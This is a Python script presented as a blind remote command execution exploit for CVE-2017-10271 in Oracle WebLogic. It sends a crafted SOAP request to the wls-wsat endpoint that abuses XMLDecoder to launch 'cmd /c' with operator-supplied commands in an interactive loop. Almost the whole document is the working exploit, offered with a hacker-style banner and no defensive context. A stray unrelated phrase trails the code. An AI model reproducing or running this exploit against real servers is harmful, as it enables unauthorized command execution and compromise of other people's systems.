import requests import sys url_in = sys.argv[1] payload_url = url_in + "/wls-wsat/CoordinatorPortType" payload_header = {'content-type': 'text/xml'} def payload_command (command_in): html_escape_table = { "&": "&", '"': """, "'": "'", ">": ">", "<": "<", } command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>" payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \ " <soapenv:Header> " \ " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \ " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \ " <void class=\"java.lang.ProcessBuilder\"> \n" \ "<array class=\"java.lang.String\" length=\"3\">" \ "<void index = \"0\"> " \ "<string>cmd</string> " \ "</void>" \ "<void index = \"1\"> " \ "<string>/c</string>" \ "</void>" \ "<void index = \"2\"> " \ + command_filtered + \ "</void>" \ "</array>" \ "<void method=\"start\"/>" \ "</void>" \ "</java>" \ "</work:WorkContext>" \ " </soapenv:Header>" \ " <soapenv:Body/>" \ "</soapenv:Envelope>" return payload_1 def do_post(command_in): result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) if result.status_code == 500: print "Command Executed \n" else: print "Something Went Wrong \n" print "***************************************************** \n" \ "**************** Coded By 1337g****************** \n" \ "*CVE-2017-10271 Blind Remote Command Execute EXP* \n" \ "***************************************************** \n" while 1: command_in = raw_input("Eneter your command here: ") if command_in == "exit" : exit(0) do_post(command_in)
体验盒子
